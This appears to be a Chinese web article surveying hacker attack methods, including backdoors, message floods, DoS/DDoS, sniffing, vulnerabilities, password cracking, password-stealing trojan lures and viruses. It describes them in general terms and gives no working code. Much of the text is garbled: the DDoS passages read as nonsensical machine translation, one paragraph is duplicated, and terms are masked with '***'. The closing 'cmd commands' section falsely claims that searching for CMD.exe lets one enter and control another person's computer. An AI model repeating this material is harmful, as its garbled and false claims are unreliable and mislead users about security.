由于程序员设计一些功能复杂的程序时，一般采用模块化的程序设计思想，将整个项目分割为多个功能模块，分别进行设计、调试，这时的后门就是一个模块的秘密入口。在程序开发阶段，后门便于测试、更改和增强模块功能。正常情况下，完成设计之后需要去掉各个模块的后门，不过有时由于疏忽或者其他原因（如将其留在程序中，便于日后访问、测试或维护）后门没有去掉，一些别有用心的人会利用穷举搜索法发现并利用这些后门，然后进入系统并发动攻击。

2、信息炸弹

信息炸弹是指使用一些特殊工具软件，短时间内向目标服务器发送大量超出系统负荷的信息，造成目标服务器超负荷、 *** 堵塞、系统崩溃的攻击手段。比如向未打补丁的 Windows 95系统发送特定组合的 UDP 数据包，会导致目标系统死机或重启；向某型号的路由器发送特定数据包致使路由器死机；向某人的电子邮件发送大量的垃圾邮件将此邮箱“撑爆”等。目前常见的信息炸弹有邮件炸弹、逻辑炸弹等。

3.DOS攻击

分为DOS攻击和DDOS攻击。DOS攻击它是使用超出被攻击目标处理能力的大量数据包消耗系统可用系统、带宽资源，最后致使 *** 服务瘫痪的一种攻击手段。作为攻击者，首先需要通过常规的黑客手段侵入并控制某个网站，然后在服务器上安装并启动一个可由攻击者发出的特殊指令来控制进程，攻击者把攻击对象的IP地址作为指令下达给进程的时候，这些进程就开始对目标主机发起攻击。这种方式可以集中大量的 *** 服务器带宽，对某个特定目标实施攻击，因而威力巨大，顷刻之间就可以使被攻击目标带宽资源耗尽，导致服务器瘫痪。比如1999年美国明尼苏达大学遭到的黑客攻击就属于这种方式。DDOS攻击是黑客进入计算条件，一个磁盘操作系统（拒绝服务）或DDoS攻击（分布式拒绝服务）攻击包括努力中断某一 *** 资源的服务，使其暂时无法使用。

这些攻击通常是为了停止一个互联网连接的主机，然而一些尝试可能的目标一定机以及服务。DDOS没有固定的地方，这些攻击随时都有可能发生；他们的目标行业全世界。分布式拒绝服务攻击大多出现在服务器被大量来自攻击者或僵尸 *** 通信的要求。

服务器无法控制超文本传输协议要求任何进一步的，最终关闭，使其服务的合法用户的一致好评。这些攻击通常不会引起任何的网站或服务器损坏，但请暂时关闭。

这种 *** 的应用已经扩大了很多，现在用于更恶意的目的；喜欢掩盖欺诈和威慑安防面板等。

4、 *** 监听

*** 监听是一种监视 *** 状态、数据流以及 *** 上传输信息的管理工具，它可以将 *** 接口设置在监听模式，并且可以截获网上传输的信息，也就是说，当黑客登录 *** 主机并取得超级用户权限后，若要登录其他主机，使用 *** 监听可以有效地截获网上的数据，这是黑客使用最多的 *** ，但是， *** 监听只能应用于物理上连接于同一网段的主机，通常被用做获取用户口令。

5.系统漏洞

许多系统都有这样那样的安全漏洞（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail漏洞，Windows98中的共享目录密码验证漏洞和IE5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你不上网。还有就是有些程序员设计一些功能复杂的程序时，一般采用模块化的程序设计思想，将整个项目分割为多个功能模块，分别进行设计、调试，这时的后门就是一个模块的秘密入口。在程序开发阶段，后门便于测试、更改和增强模块功能。正常情况下，完成设计之后需要去掉各个模块的后门，不过有时由于疏忽或者其他原因（如将其留在程序中，便于日后访问、测试或维护）后门没有去掉，一些别有用心的人会利用专门的扫描工具发现并利用这些后门，然后进入系统并发动攻击。

6、密码破解当然也是黑客常用的攻击手段之一。

7.诱入法

黑客编写一些看起来“合法”的程序，上传到一些FTP站点或是提供给某些个人主页，诱导用户下载。当一个用户下载软件时，黑客的软件一起下载到用户的机器上。该软件会跟踪用户的电脑操作，它静静地记录着用户输入的每个口令，然后把它们发送给黑客指定的Internet信箱。例如，有人发送给用户电子邮件，声称为“确定我们的用户需要”而进行调查。作为对填写表格的回报，允许用户 *** 多少小时。但是，该程序实际上却是搜集用户的口令，并把它们发送给某个远方的“黑客”

8.病毒攻击

计算机病毒可通过网页、即时通信软件、恶意软件、系统漏洞、U盘、移动硬盘、电子邮件、BBS等传播。

注：黑客的攻击手段还有很多

cmd攻击别人电脑命令，

无法攻击别人电脑，但是可以访问别人电脑。

如下参考：

1.在桌面上,单击“开始”,单击“运行”。

2.输入输入CMDCMD并单击ok。

3.或单击“开始”,并输入CMD。

4.单击搜索CMD,然后您可以输入属。

5.单击“计算机”,单击“磁盘C。

6.搜索CMD.Exe,点击搜索软件,然后就可以进入别人的电脑内部，可以控制电脑了。